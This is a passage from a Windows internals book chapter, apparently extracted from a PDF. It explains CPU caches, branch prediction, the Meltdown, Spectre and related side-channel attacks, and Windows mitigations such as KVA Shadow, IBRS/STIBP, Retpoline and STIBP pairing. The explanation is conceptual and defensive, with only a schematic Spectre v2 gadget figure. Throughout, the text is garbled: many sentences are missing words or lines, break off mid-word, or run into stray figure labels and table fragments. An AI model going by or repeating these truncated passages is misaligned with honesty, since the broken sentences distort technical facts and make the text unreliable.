cessors, the L3 cache usually does not exist).
Core 1
Registers
L1 Cache
L2 Cache
Core 2
Registers
L1 Cache
L2 Cache
L3 Cache
Shared
Size:
Speed:
~ 2KB
250 ps
64 KB
1 ns
256 KB
3 - 10 ns
2 - 32 KB
10 + 20 ns
8 -128 KB
50 - 100 ns
128 GB - 2 TB
50 - 100 µs
SSD
CPU
FIGURE 8-2 Caches and storage memory of modern CPUs and their average size and access time.
though it is still slower). Access time to the main memory is instead a hundred times slower. This means
that in case the CPU executes all the instructions in order, many times there would be huge slowdowns
due to instructions accessing data located in the main memory. To overcome this problem, modern
CPUs implement various strategies. Historically, those strategies have led to the discovery of side-chan-
nel attacks (also known as speculative attacks), which have been proven to be very effective against the
overall security of the end-user systems.
To correctly describe side-channel hardware attacks and how Windows mitigates them, we should
discuss some basic concepts regarding how the CPU works internally.
Out-of-order execution
A modern microprocessor executes machine instructions thanks to its pipeline. The pipeline contains
many stages, including instruction fetch, decoding, register allocation and renaming, instructions
reordering, execution, and retirement. A common strategy used by the CPUs to bypass the memory
slowdown problem is the capability of their execution engine to execute instructions out of order as
soon as the required resources are available. This means that the CPU does not execute the instructions
in a strictly sequential order, maximizing the utilization of all the execution units of the CPU core as
exhaustive as possible. A modern processor can execute hundreds of instructions speculatively before
it is certain that those instructions will be needed and committed (retired).
One problem of the described out-of-order execution regards branch instructions. A conditional
-
pends on the previously executed instructions. When calculating the condition depends on previous
CHAPTER 8 System mechanisms
11
instructions that access slow RAM memory, there can be slowdowns. In that case, the execution engine
memory bus to complete the memory access) before being able to continue in the out-of-order execu-
tion of the following instructions belonging to the correct path. A similar problem happens in the case
of indirect branches. In this case, the execution engine of the CPU does not know the target of a branch
(usually a jump or a call) because the address must be fetched from the main memory. In this context,
the term speculative execution-
tions in parallel or in an out-of-order way, but the results are not retired into permanent registers, and
The CPU branch predictor
How does the CPU know which branch (path) should be executed before the branch condition has
been completely evaluated? (The issue is similar with indirect branches, where the target address is
not known). The answer lies in two components located in the CPU package: the branch predictor and
the branch target predictor.
The branch predictor is a complex digital circuit of a CPU that tries to guess which path a branch
that tries to predict the target of indirect branches before it is known. While the actual hardware imple-
mentation heavily depends on the CPU manufacturer, the two components both use an internal cache
called Branch Target Buffer (BTB), which records the target address of branches (or information about
what the conditional branch has previously done in the past) using an address tag generated through
an indexing function, similar to how the cache generates the tag, as explained in the next section. The
time, the execution pipeline is stalled, forcing the CPU to wait for the condition or target address to be
fetched from the main memory. The second time the same branch is executed, the target address in
of an example branch target predictor.
Virtual address: 0xFFFF AAAA9F43AA17
Indexing
Function
Idx
12
Address Tag
9F43AA17
Target
0x9F528092
Branch Target Buffer
F(Addr)
FIGURE 8-3 The scheme of a sample CPU branch predictor.
In case the prediction was wrong, and the wrong path was executed speculatively, then the instruc-
fed into the CPU pipeline and the execution restarts from the correct branch. This case is called branch
12
CHAPTER 8 System mechanisms
misprediction. The total number of wasted CPU cycles is not worse than an in-order execution wait-
ing for the result of a branch condition or indirect address evaluation. However, different side effects
of the speculative execution can still happen in the CPU, like the pollution of the CPU cache lines.
Unfortunately, some of these side effects can be measured and exploited by attackers, compromising
the overall security of the system.
The CPU cache(s)
As introduced in the previous section, the CPU cache is a fast memory that reduces the time needed for
sizes (usually 64 or 128 bytes) called lines or cache blocks. When a cache line is copied from memory
into the cache, a cache entry is created. The cache entry will include the copied data as well as a tag
identifying the requested memory location. Unlike the branch target predictor, the cache is always in-
dexed through physical addresses (otherwise, it would be complex to deal with multiple mappings and
Whereas the higher bits usually represent the tag, the lower bits represent the cache line and the offset
into the line. A tag is used to uniquely identify which memory address the cache block belongs to, as
cache (in any cache lines that might contain data from that address. Some caches have different ways
-
cation is in the cache, a cache hit has occurred, and the processor immediately reads or writes the data
from/in the cache line. Otherwise, a cache miss has occurred. In this case, the CPU allocates a new entry
in the cache and copies data from main memory before accessing it.
CPU
RAM Memory
48-bits one-way 256 blocks CACHE
Block size: 256 byte
Physical Address
0x00019F56 60 30
0x019F566030
0
0
10
20
30
40
50
60
70
80
90
A0
B0
C0
D0
E0
F0
10 20 30 40 50 60 70 80 90 A0 B0 C0 D0 E0 F0
TAG
0x019F56
DATA
FIGURE 8-4 A sample 48-bit one-way CPU cache.
of virtual address space. In the sample, the CPU is reading 48 bytes of data located at virtual address
CHAPTER 8 System mechanisms
13
In a similar way, when the CPU is instructed to write some new content to a memory address, it
data back to the physical RAM as well, depending on the caching type (write-back, write-through,
uncached, and so on) applied to the memory page. (Note that this has an important implication in
multiprocessor systems: A cache coherency protocol must be designed to prevent situations in which
another CPU will operate on stale data after the main CPU has updated a cache block. (Multiple CPU
cache coherency algorithms exist and are not covered in this book.)
To make room for new entries on cache misses, the CPU sometime should evict one of the existing
cache blocks. The algorithm the cache uses to choose which entry to evict (which means which block
will host the new data) is called the placement policy. If the placement policy can replace only one block
for a particular virtual address, the cache is called direct mapped
way and is direct mapped). Otherwise, if the cache is free to choose any entry (with the same block
number) to hold the new data, the cache is called fully associative. Many caches implement a compro-
mise in which each entry in main memory can go to any one of N places in the cache and are described
as N-ways set associative. A way is thus a subdivision of a cache, with each way being of equal size and
can store data belonging to four different physical addresses indexing the same cache block (with dif-
ferent tags) in four different cache sets.
Data RAM
Offset
Tag
Tag RAM
Way
Index
Set
Line
FIGURE 8-5 A four-way set associative cache.
Side-channel attacks
As discussed in the previous sections, the execution engine of modern CPUs does not write the result of
the computation until the instructions are actually retired. This means that, although multiple instruc-
tions are executed out of order and do not have any visible architectural effects on CPU registers and
memory, they have microarchitectural side effects, especially on the CPU cache. At the end of the year
14
CHAPTER 8 System mechanisms
2017, novel attacks were demonstrated against the CPU out-of-order engines and their branch predic-
tors. These attacks relied on the fact that microarchitectural side effects can be measured, even though
they are not directly accessible by any software code.
The two most destructive and effective hardware side-channel attacks were named Meltdown
and Spectre.
Meltdown
Meltdown (which has been later called Rogue Data Cache load, or RDCL) allowed a malicious user-
mode process to read all memory, even kernel memory, when it was not authorized to do so. The at-
tack exploited the out-of-order execution engine of the processor and an inner race condition between
the memory access and privilege check during a memory access instruction processing.
-
tions that do so are callable from user mode). The process then executes an illegal kernel memory
probe array). The process
cannot access the kernel memory, so an exception is generated by the processor. The exception is
caught by the application. Otherwise, it would result in the termination of the process. However, due to
the out-of-order execution, the CPU has already executed (but not retired, meaning that no architec-
tural effects are observable in any CPU registers or RAM) the instructions following the illegal memory
The malicious application then probes the entire cache by measuring the time needed to access each
which is taken from the original Meltdown research paper (available at the https://meltdownattack.com/
Access time
(cycles)
500
400
300
200
0
50
100
150
200
250
Page
FIGURE 8-6 CPU time employed for accessing a 1 MB probe array.
data can be read one byte per time and one byte can have only 256 values, knowing the exact page in
the array that led to a cache hit allows the attacker to know which byte is stored in the kernel memory.
Spectre
explained in the previous section, but the main CPU components exploited by Spectre are the branch
predictor and branch target predictor. Two variants of the Spectre attack were initially presented.
Both are summarized by three phases:
CHAPTER 8 System mechanisms
15
1.
In the setup phase, from a low-privileged process (which is attacker-controlled), the attacker
performs multiple repetitive operations that mistrain the CPU branch predictor. The goal is to
indirect branch.
2.
In the second phase, the attacker forces a victim high-privileged application (or the same pro-
cess) to speculatively execute instructions that are part of a mispredicted branch. Those instruc-
channel (usually the CPU cache).
3.
-
tion stored in the CPU cache (microarchitectural channel) by probing the entire cache (the same
methods employed in the Meltdown attack). This reveals secrets that should be secured in the
victim high-privileged address space.
(which can be the same or different than the address space that the attacker controls), by forcing the CPU
branch predictor to execute the wrong branch of a conditional branch speculatively. The branch is usu-
ally part of a function that performs a bound check before accessing some nonsecret data contained
in a memory buffer. If the buffer is located adjacent to some secret data, and if the attacker controls
the offset supplied to the branch condition, she can repetitively train the branch predictor supplying
that implements the bound check branch. The CPU branch predictor is trained to always follow the
initial legit path. However, this time, the path would be wrong (the other should be taken). The instruc-
tions accessing the memory buffer are thus speculatively executed and result in a read outside the
boundaries, which targets the secret data. The attacker can thus read back the secrets by probing the
entire cache (similar to the Meltdown attack).
The second variant of Spectre exploits the CPU branch target predictor; indirect branches can be
poisoned by an attacker. The mispredicted path of an indirect branch can be used to read arbitrary
memory of a victim process (or the OS kernel) from an attacker-controlled context. As shown in
-
ing the CPU to build enough information in the BTB to speculatively execute instructions located at
an address chosen by the attacker. In the victim address space, that address should point to a gad-
get. A gadget is a group of instructions that access a secret and store it in a buffer that is cached in a
controlled way (the attacker needs to indirectly control the content of one or more CPU registers in the
victim, which is a common case when an API accepts untrusted input data).
a service provided by the target higher-privileged entity (a process or the OS kernel). The code that
implements the service must implement similar indirect branches as the attacker-controlled process.
The CPU branch target predictor in this case speculatively executes the gadget located at the wrong
target address. This, as for Variant 1 and Meltdown, creates microarchitectural side effects in the CPU
cache, which can be read from the low-privileged context.
16
CHAPTER 8 System mechanisms
kernelbase.dll
Attacker process
(low privileged)
CPU Branch
Predictor
0x105F0 + ∆
0x110BC + ∆
0x2147A + ∆
_imp_NtSetEvent:
dl @ntdll!gadget
SetEvent:
call [_imp_NtSetEvent]
ntdll.dll
0x24026 + ∆
gadget:
ret
NtSetEvent:
mov
eax,0Eh
sysenter
CALL
kernelbase.dll
Victim process
(high privileged)
0x105F0 + Ω
0x110BC + Ω
0x2147A + Ω
_imp_NtSetEvent:
dl @ntdll!NtSetEvent
SetEvent:
call [_imp_NtSetEvent]
ntdll.dll
0x24026 + Ω
gadget:
mov eax, array$[esp-4]
mov d1, [eax+ecx*4]
mov eax, _array2$[esp-4]
NtSetEvent:
mov
eax,0Eh
sysenter
Speculate
CPU
FIGURE 8-7 A scheme of Spectre attack Variant 2.
Other side-channel attacks
After Spectre and Meltdown attacks were originally publicly released, multiple similar side-channel
hardware attacks were discovered. Even though they were less destructive and effective compared to
Meltdown and Spectre, it is important to at least understand the overall methodology of those new
side-channel attacks.
Speculative store bypass (SSB) arises due to a CPU optimization that can allow a load instruction,
which the CPU evaluated not to be dependent on a previous store, to be speculatively executed before
the results of the store are retired. If the prediction is not correct, this can result in the load operation
reading stale data, which can potentially store secrets. The data can be forwarded to other operations
executed during speculation. Those operations can access memory and generate microarchitectural
side effects (usually in the CPU cache). An attacker can thus measure the side effects and recover the
secret value.
The Foreshadow (also known as L1TF) is a more severe attack that was originally designed for
stealing secrets from a hardware enclave (SGX) and then generalized also for normal user-mode
speculative execution engine of modern CPUs. In particular:
I
Speculation on inaccessible virtual memory. In this scenario, when the CPU accesses some data
stored at a virtual address described by a Page table entry (PTE) that does not include the pres-
ent bit (meaning that the address is is not valid) an exception is correctly generated. However,
if the entry contains a valid address translation, the CPU can speculatively execute the instruc-
tions that depend on the read data. As for all the other side-channel attacks, those instructions
are not retired by the processor, but they produce measurable side effects. In this scenario, a
user-mode application would be able to read secret data stored in kernel memory. More seri-
ously, the application, under certain circumstances, would also be able to read data belonging
CHAPTER 8 System mechanisms
17
to another virtual machine: when the CPU encounters a nonpresent entry in the Second Level
Address Translation table (SLAT) while translating a guest physical address (GPA), the same side
effects can happen. (More information on the SLAT, GPAs, and translation mechanisms are pres-
ent in Chapter 5 of Part 1 and in Chapter 9, “Virtualization technologies”).
I
more than one execution pipeline per physical core, which can execute in an out-of-order way
multiple instruction streams using a single shared execution engine (this is Symmetric multi-
threading, or SMT, as explained later in Chapter 9.) In those processors, two logical processors
(LPs) share a single cache. Thus, while an LP is executing some code in a high-privileged context,
the other sibling LP can read the side effects produced by the high-privileged code executed
by the other LP. This has very severe effects on the global security posture of a system. Similar to
even spoil secrets stored in another high-security virtual-machine just by waiting for the virtual
is part of the Group 4 vulnerabilities.
Microarchitectural side effects are not always targeting the CPU cache. Intel CPUs use other
intermediate high-speed buffers with the goal to better access cached and noncached memory
and reorder micro-instructions. (Describing all those buffers is outside the scope of this book.) The
Microarchitectural Data Sampling (MDS) group of attacks exposes secrets data located in the following
microarchitectural structures:
I
Store buffers While performing store operations, processors write data into an internal tem-
porary microarchitectural structure called store buffer, enabling the CPU to continue to execute
instructions before the data is actually written in the cache or main memory (for noncached
memory access). When a load operation reads data from the same memory address as an ear-
lier store, the processor may be able to forward data directly from the store buffer.
I
Fill buffers
-
mediary between the CPU cache and the CPU out-of-order execution engine. They may retain
data from prior memory requests, which may be speculatively forwarded to a load operation.
I
Load ports Load ports are temporary internal CPU structures used to perform load opera-
tions from memory or I/O ports.
Microarchitectural buffers usually belong to a single CPU core and are shared between SMT threads.
This implies that, even if attacks on those structures are hard to achieve in a reliable way, the specula-
tive extraction of secret data stored into them is also potentially possible across SMT threads (under
In general, the outcome of all the hardware side-channel vulnerabilities is the same: secrets will be
spoiled from the victim address space. Windows implements various mitigations for protecting against
Spectre, Meltdown, and almost all the described side-channel attacks.
18
CHAPTER 8 System mechanisms
Side-channel mitigations in Windows
This section takes a peek at how Windows implements various mitigations for defending against side-
channel attacks. In general, some side-channel mitigations are implemented by CPU manufacturers
through microcode updates. Not all of them are always available, though; some mitigations need to
be enabled by the software (Windows kernel).
KVA Shadow
-
tween the kernel and user page tables. Speculative execution allows the CPU to spoil kernel data when
the processor is not at the correct privilege level to access it, but it requires that a valid page frame
number be present in the page table translating the target kernel page. The kernel memory targeted
by the Meltdown attack is generally translated by a valid leaf entry in the system page table, which
indicates only supervisor privilege level is allowed. (Page tables and virtual address translation are cov-
page tables for each process:
I
The kernel page tables map the entire process address space, including kernel and user pages.
In Windows, user pages are mapped as nonexecutable to prevent kernel code to execute mem-
ory allocated in user mode (an effect similar to the one brought by the hardware SMEP feature).
I
The User page tables (also called shadow page tables) map only user pages and a minimal set
of kernel pages, which do not contain any sort of secrets and are used to provide a minimal
functionality for switching page tables, kernel stacks, and to handle interrupts, system calls, and
other transitions and traps. This set of kernel pages is called transition address space.
In the transition address space, the NT kernel usually maps a data structure included in the proces-
shadow
Administrator-level privileges) in processes that do not have mapped any kernel page that may contain
secrets. The Meltdown attack is not effective anymore; kernel pages are not mapped as valid in the
happen. When the user process invokes a system call, or when an interrupt happens while the CPU is
executing code in the user-mode process, the CPU builds a trap frame on a transition stack, which, as
of the shadow trap handler that handles the interrupt or system call. The latter normally switches to
the kernel page tables, copies the trap frame on the kernel stack, and then jumps to the original trap
executed with the entire address space mapped.
CHAPTER 8 System mechanisms
19
Initialization
The NT kernel determines whether the CPU is susceptible to Meltdown attack early in phase -1 of its
initialization, after the processor feature bits are calculated, using the internal KiDetectKvaLeakage
KiKvaLeakage variable to 1 for
all Intel processors except Atoms (which are in-order processors).
In case the internal KiKvaLeakage
KiEnableKvaShadowing
stacks. Transition stacks (which are 512 bytes in size) are prepared by writing a small data structure,
linked against its nontransition kernel stack (accessible only after the page tables have been switched),
thread has a proper kernel stack. The scheduler set a kernel stack as active by linking it in the processor
PRCB when a new thread is selected to be executed. This is a key difference compared to the IST stacks,
which exist as one per processor.
Transition Space
0
+ 0x200
+ 0x5FE0
+ 0x6000
+ 0x6000
+ 0x5FE0
+ 0x6000
0
0
0
BASE/TOP
BASE
TOP
BASE
TOP
BASE
TOP
+ 0x200
+ 0x200
Processor’s TSS
Kernel Space
+
Memory
IST
Transition
Stack
KTHREAD
KIST_BASE_FRAME
KIST_LINK_FRAME
IST Stack
IST
Transition
Stack
KIST_BASE_FRAME
RSP 0
…
IST 0
…
IST 2
…
IoMapBase
0
+ 0x1D0
0
+ 0x1D0
Transition
Stack
BASE
TOP
BASE/TOP
KIST_LINK_FRAME
IST Stack
Kernel Stack*
FIGURE 8-8
The KiEnableKvaShadowing
algorithm (explained later in this section). The result of the determination (global entries or PCIDs) is
stored in the global KiKvaShadowMode
KiShadowProcessorAllocation, which maps the per-processor shared data structures in the shadow page
shadow page tables are created (and the IRQL is dropped to passive level). The shadow trap handlers are
Shadow page tables
Shadow (or user) page tables are allocated by the memory manager using the internal MiAllocate
ProcessShadow
for the new process are initially created empty. The memory manager then copies all the kernel
shadow top-level page table entries of the SYSTEM process in the new process shadow page table.
20
CHAPTER 8 System mechanisms
This allows the OS to quickly map the entire transition address space (which lives in kernel and is
KiShadowProcessorAllocation routine, which uses memory manager services to map individual chunks
of memory in the shadow page tables and to rebuild the entire page hierarchy.
can write in the process page tables to map or unmap chunks of memory. When a request to allocate
or map new memory into a user process address space, it may happen that the top-level page table
entry for a particular address would be missing. In this case, the memory manager allocates all the
pages for the entire page-table hierarchy and stores the new top-level PTE in the kernel page tables.
top-level PTE on the shadow page table. Otherwise, the address will be not present in the user-map-
ping after the trap handler correctly switches the page tables before returning to user mode.
kernel page tables. To prevent false sharing of addresses close to the chunk of memory being mapped
in the transition address space, the memory manager always recreates the page table hierarchy map-
ping for the PTE(s) being shared. This implies that every time the kernel needs to map some new pages
in the transition address space of a process, it must
page tables (the internal MiCopyTopLevelMappings routine performs exactly this operation).
TLB flushing algorithm
(translation look-aside buffer). The TLB is a cache used by the processor to quickly translate the virtual ad-
dresses that are used while executing code or accessing data. A valid entry in the TLB allows the processor
-
nel address space is mostly unique and shared between all processes. Intel and AMD introduced differ-
detail in the Intel and AMD architecture manuals and are not further discussed in this book.
-
-
lowing two goals:
I
No valid kernel entries will be ever maintained in the TLB when executing a thread user-code.
Otherwise, this could be leveraged by an attacker with the same speculation techniques used in
Meltdown, which could lead her to read secret kernel data.
I
CHAPTER 8 System mechanisms
21
trap exit. It can run on a system that either supports only the global/non-global bit or also PCIDs. In the
while a page table switch happens (the system changes the value of the CR3 register). Systems with
PCID support labels kernel pages with PCID 2, whereas user pages are labelled with PCID 1. The global
and non-global bits are ignored in this case.
When the current-executing thread ends its quantum, a context switch is initialized. When the
kernel schedules execution for a thread belonging to another process address space, the TLB algorithm
assures that all the user pages are removed from the TLB (which means that in systems with global/
kernel entries are removed (or invalidated) from the TLB. This is easily achievable: on processors with
global/non-global bit support, just a reload of the page tables forces the processor to invalidate all the
non-global pages, whereas on systems with PCID support, the user-page tables are reloaded using the
User PCID, which automatically invalidates all the stale kernel TLB entries.
The strategy allows kernel trap entries, which can happen when an interrupt is generated while the
system was executing user code or when a thread invokes a system call, not to invalidate anything in
TABLE 8-1
Configuration Type
User Pages
Kernel Pages
Transition Pages
Non-global
Global
N / D
PCID 1, non-global
PCID 2, non-global
PCID 1, non-global
Global
Non-global
Global
Hardware indirect branch controls (IBRS, IBPB, STIBP, SSBD)
Processor manufacturers have designed hardware mitigations for various side-channel attacks. Those
mitigations have been designed to be used with the software ones. The hardware mitigations for side-
channel attacks are mainly implemented in the following indirect branch controls mechanisms, which
I
Indirect Branch Restricted Speculation (IBRS) completely disables the branch predictor (and
clears the branch predictor buffer) on switches to a different security context (user vs kernel
mode or VM root vs VM non-root). If the OS sets IBRS after a transition to a more privileged
mode, predicted targets of indirect branches cannot be controlled by software that was ex-
ecuted in a less privileged mode. Additionally, when IBRS is on, the predicted targets of indirect
branches cannot be controlled by another logical processor. The OS usually sets IBRS to 1 and
keeps it on until it returns to a less privileged security context.
The implementation of IBRS depends on the CPU manufacturer: some CPUs completely disable
branch predictors buffers when IBRS is set to on (describing an inhibit behavior), while some
22
CHAPTER 8 System mechanisms
mitigation control works in a very similar way to IBPB, so usually the CPU implement only IBRS.
I
Indirect Branch Predictor Barrier (IBPB)
it is set to 1, creating a barrier that prevents software that executed previously from controlling
the predicted targets of indirect branches on the same logical processor.
I
Single Thread Indirect Branch Predictors (STIBP) restricts the sharing of branch prediction
between logical processors on a physical CPU core. Setting STIBP to 1 on a logical processor
prevents the predicted targets of indirect branches on a current executing logical processor
from being controlled by software that executes (or executed previously) on another logical
processor of the same core.
I
Speculative Store Bypass Disable (SSBD) instructs the processor to not speculatively execute
loads until the addresses of all older stores are known. This ensures that a load operation does
not speculatively consume stale data values due to bypassing an older store on the same logi-
cal processor, thus protecting against Speculative Store Bypass attack (described earlier in the
“Other side-channel attacks” section).
The NT kernel employs a complex algorithm to determine the value of the described indirect branch
trap entries, and trap exits. On compatible systems, the system runs kernel code with IBRS always on (ex-
cept when Retpoline is enabled). When no IBRS is available (but IBPB and STIBP are supported), the kernel
another security context). SSBD, when supported by the CPU, is always enabled in kernel mode.
mitigations enabled or just with STIBP on (depending on STIBP pairing being enabled, as explained in
the next section). The protection against Speculative Store Bypass must be manually enabled if needed
through the global or per-process Speculation feature. Indeed, all the speculation mitigations can be
to an individual setting. Table 8-2 describes individual feature settings and their meaning.
TABLE 8-2
Name
Value
Meaning
0x1
Disable IBRS except for non-nested root partition
0x2
0x4
0x8
Always set SSBD in kernel and user
0x10
Set SSBD only in kernel mode (leaving user-mode
code to be vulnerable to SSB attacks)
0x20
Always keep STIBP on for user-threads, regardless of
STIBP pairing
CHAPTER 8 System mechanisms
23
Name
Value
Meaning
0x40
Disables the default speculation mitigation strategy
(for AMD systems only) and enables the user-to-user
controls are set when running in kernel mode.
0x80
Always disable STIBP pairing
0x100
Always disable Retpoline
0x200
Enable Retpoline regardless of the CPU support of
IBPB or IBRS (Retpoline needs at least IBPB to prop-
erly protect against Spectre v2)
0x20000
Disable Import Optimization regardless of Retpoline
Retpoline and import optimization
not acceptable for games and mission-critical applications, which were running with a lot of perfor-
mance degradation. The mitigation that was bringing most of the performance degradation was IBRS
possible without using any hardware mitigations thanks to the memory fence instructions. A good
execute any new operations speculatively before the fence itself completes. Only when the fence com-
to execute (and to speculate) new opcodes. The second variant of Spectre was still requiring hardware
mitigations, though, which implies all the performance problems brought by IBRS and IBPB.
speculative execution. Instead of performing a vulnerable indirect call, the processor jumps to a safe
the new target thanks to a “return” operation.
FIGURE 8-9 Retpoline code sequence of x86 CPUs.
In Windows, Retpoline is implemented in the NT kernel, which can apply the Retpoline code se-
quence to itself and to external driver images dynamically through the Dynamic Value Relocation Table
(DVRT). When a kernel image is compiled with Retpoline enabled (through a compatible compiler), the
24
CHAPTER 8 System mechanisms
-
but augmented with a variable size padding. The entry in the DVRT includes all the information that
external drivers compiled with Retpoline support can run also on older OS versions, which will simply
skip parsing the entries in the DVRT table.
Note The DVRT was originally developed for supporting kernel ASLR (Address Space Layout
Randomization, discussed in Chapter 5 of Part 1). The table was later extended to include
Retpoline descriptors. The system can identify which version of the table an image includes.
In phase -1 of its initialization, the kernel detects whether the processor is vulnerable to Spectre, and,
in case the system is compatible and enough hardware mitigations are available, it enables Retpoline
and applies it to the NT kernel image and the HAL. The RtlPerformRetpolineRelocationsOnImage rou-
tine scans the DVRT and replaces each indirect branch described by an entry in the table with a direct
branch, which is not vulnerable to speculative attacks, targeting the Retpoline code sequence. The
original target address of the indirect branch is saved in a CPU register (R10 in AMD and Intel proces-
sors), with a single instruction that overwrites the padding generated by the compiler. The Retpoline
Before being started, boot drivers are physically relocated by the internal MiReloadBootLoadedDrivers
boot drivers, the NT kernel, and HAL images are allocated in a contiguous virtual address space by
the Windows Loader and do not have an associated control area, rendering them not pageable. This
means that all the memory backing the images is always resident, and the NT kernel can use the same
RtlPerformRetpolineRelocationsOnImage function to modify each indirect branch in the code directly.
PERFORM_
RETPOLINE_RELOCATIONS-
Note
for further details) initializes and protects some of them. It is illegal for drivers and the NT
kernel itself to modify code sections of protected drivers.
Runtime drivers, as explained in Chapter 5 of Part 1, are loaded by the NT memory manager, which
CHAPTER 8 System mechanisms
25
page fault handler. Windows applies Retpoline on the shared pages pointed by the prototype PTEs. If
the same section is also mapped by a user-mode application, the memory manager creates new private
pages and copies the content of the shared pages in the private ones, reverting Retpoline (and Import
Note
Retpoline cannot be enabled because it would not be able to protect against Spectre v2. In
this situation, only hardware mitigations can be applied. Enhanced IBRS (a new hardware
mitigation) solves the performance problems of IBRS.
The Retpoline bitmap
One of the original design goals (restraints) of the Retpoline implementation in Windows was to sup-
port a mixed environment composed of drivers compatible with Retpoline and drivers not compatible
with it, while maintaining the overall system protection against Spectre v2. This implies that drivers
that do not support Retpoline should be executed with IBRS on (or STIBP followed by an IBPB on kernel
entry, as discussed previously in the ”Hardware indirect branch controls” section), whereas others can
run without any hardware speculation mitigations enabled (the protection is brought by the Retpoline
code sequences and memory fences).
To dynamically achieve compatibility with older drivers, in the phase 0 of its initialization, the NT
space contains Retpoline compatible code; a 0 means the opposite. The NT kernel then sets to 1 the
bits referring to the address spaces of the HAL and NT images (which are always Retpoline compatible).
Every time a new kernel image is loaded, the system tries to apply Retpoline to it. If the application suc-
ceeds, the respective bits in the Retpoline bitmap are set to 1.
The Retpoline code sequence is augmented to include a bitmap check: Every time an indirect branch
is performed, the system checks whether the original call target resides in a Retpoline-compatible
module. In case the check succeeds (and the relative bit is 1), the system executes the Retpoline code
Retpoline bitmap is 0), a Retpoline exit sequence is initialized. The RUNNING_NON_RETPOLINE_CODE
SPEC_CONTROL
-
ware mitigations provide the needed protection).
When the thread quantum ends, and the scheduler selects a new thread, it saves the Retpoline
status (represented by the presence of the RUNNING_NON_RETPOLINE_CODE
processors in the KTHREAD data structure of the old thread. In this way, when the old thread is selected
again for execution (or a kernel trap entry happens), the system knows that it needs to re-enable the
needed hardware speculation mitigations with the goal of keeping the system always protected.
26
CHAPTER 8 System mechanisms
Import optimization
Retpoline entries in the DVRT also describe indirect branches targeting imported functions. An im-
ported control transfer entry in the DVRT describes this kind of branch by using an index referring to
pointers compiled by the loader.) After the Windows loader has compiled the IAT, it is unlikely that its
it is not needed to transform an indirect branch targeting an imported function to a Retpoline one be-
cause the NT kernel can ensure that the virtual addresses of the two images (caller and callee) are close
enough to directly invoke the target (less than 2 GB).
FIGURE 8-10 Different indirect branches on the ExAllocatePool function.
Import optimization (internally also known as “import linking”) is the feature that uses Retpoline
dynamic relocations to transform indirect calls targeting imported functions into direct branches. If
a direct branch is used to divert code execution to an imported function, there is no need to apply
Retpoline because direct branches are not vulnerable to speculation attacks. The NT kernel ap-
plies Import Optimization at the same time it applies Retpoline, and even though the two features
Optimization, Windows has been able to gain a performance boost even on systems that are not vul-
nerable to Spectre v2. (A direct branch does not require any additional memory access.)
STIBP pairing
In hyperthreaded systems, for protecting user-mode code against Spectre v2, the system should run
user threads with at least STIBP on. On nonhyperthreaded systems, this is not needed: protection
against a previous user-mode thread speculation is already achieved thanks to the IBRS being enabled
while previously executing kernel-mode code. In case Retpoline is enabled, the needed IBPB is emitted
branch prediction buffer is empty before executing the code of the user thread.
Leaving STIBP enabled in a hyper-threaded system has a performance penalty, so by default
it is disabled for user-mode threads, leaving a thread to be potentially vulnerable by speculation
from a sibling SMT thread. The end-user can manually enable STIBP for user threads through the
CHAPTER 8 System mechanisms
27
mitigation option.
The described scenario is not ideal. A better solution is implemented in the STIBP pairing mecha-
nism. STIBP pairing is enabled by the I/O manager in phase 1 of the NT kernel initialization (using the
KeOptimizeSpecCtrlSettings function) only under certain conditions. The system should have hyper-
-
ible only on non-nested virtualized environments or when Hyper-V is disabled (refer to Chapter 9 for
further details.)
in the EPROCESS data structure), which is represented by a 64-bit number. The system security domain
-
istrative token. Nonsystem security domains are assigned at process creation time (by the internal
PspInitializeProcessSecurity function) following these rules:
I
If the new process is created without a new primary token explicitly assigned to it, it obtains the
same security domain of the parent process that creates it.
I
CreateProcessAsUser or CreateProcessWithLogon APIs, for example), a new user security domain
ID is generated for the new process, starting from the internal PsNextSecurityDomain symbol.
The latter is incremented every time a new domain ID is generated (this ensures that during the
system lifetime, no security domains can collide).
I
Note that a new primary token can be also assigned using the NtSetInformationProcess API
(with the ProcessAccessToken
the API to succeed, the process should have been created as suspended (no threads run in it). At
this stage, the process still has its original token in an unfrozen state. A new security domain is
assigned following the same rules described earlier.
Security domains can also be assigned manually to different processes belonging to the
same group. An application can replace the security domain of a process with another one
of a process belonging to the same group using the NtSetInformationProcess API with the
ProcessCombineSecurityDomainsInformation class. The API accepts two process handles and replaces
open each other with the PROCESS_VM_WRITE and PROCESS_VM_OPERATION access rights.
Security domains allow the STIBP pairing mechanism to work. STIBP pairing links a logical proces-
sor (LP) with its sibling (both share the same physical core. In this section, we use the term LP and CPU
interchangeably). Two LPs are paired by the STIBP pairing algorithm (implemented in the internal
KiUpdateStibpPairing function) only when the security domain of the local CPU is the same as the one
of the remote CPU, or one of the two LPs is Idle. In these cases, both the LPs can run without STIBP be-
ing set and still be implicitly protected against speculation (there is no advantage in attacking a sibling
CPU running in the same security context).
28
CHAPTER 8 System mechanisms
The STIBP pairing algorithm is implemented in the KiUpdateStibpPairing function and includes a full
state machine. The routine is invoked by the trap exit handler (invoked when the system exits the kernel
pairing state of an LP can become stale mainly for two reasons:
I
The NT scheduler has selected a new thread to be executed in the current CPU. If the new thread
This allows the STIBP pairing algorithm to re-evaluate the pairing state of the two.
I
When the sibling CPU exits from its idle state, it requests the remote CPU to re-evaluate its
STIBP pairing state.
Note that when an LP is running code with STIBP enabled, it is protected from the sibling CPU
speculation. STIBP pairing has been developed based also on the opposite notion: when an LP executes
with STIBP enabled, it is guaranteed that its sibling CPU is protected against itself. This implies that
when a context switches to a different security domain, there is no need to interrupt the sibling CPU
even though it is running user-mode code with STIBP disabled.
The described scenario is not true only when the scheduler selects a VP-dispatch thread (backing
a virtual processor of a VM in case the Root scheduler is enabled; see Chapter 9 for further details)
belonging to the VMMEM process. In this case, the system immediately sends an IPI to the sibling
thread for updating its STIBP pairing state. Indeed, a VP-dispatch thread runs guest-VM code, which
can always decide to disable STIBP, moving the sibling thread in an unprotected state (both runs with
STIBP disabled).
EXPERIMENT: Querying system side-channel mitigation status
Windows exposes side-channel mitigation information through the SystemSpeculationControl
Information and SystemSecureSpeculationControlInformation information classes used by the
NtQuerySystemInformation native API. Multiple tools exist that interface with this API and show
to the end user the system side-channel mitigation status:
I
supported by Microsoft, which is open source and available at the following GitHub
repository: https://github.com/microsoft/SpeculationControl
I
The SpecuCheck tool, developed by Alex Ionescu (one of the authors of this book),
which is open source and available at the following GitHub repository:
https://github.com/ionescu007/SpecuCheck
I
The SkTool, developed by Andrea Allievi (one of the authors of this book) and distributed
(at the time of this writing) in newer Insider releases of Windows.
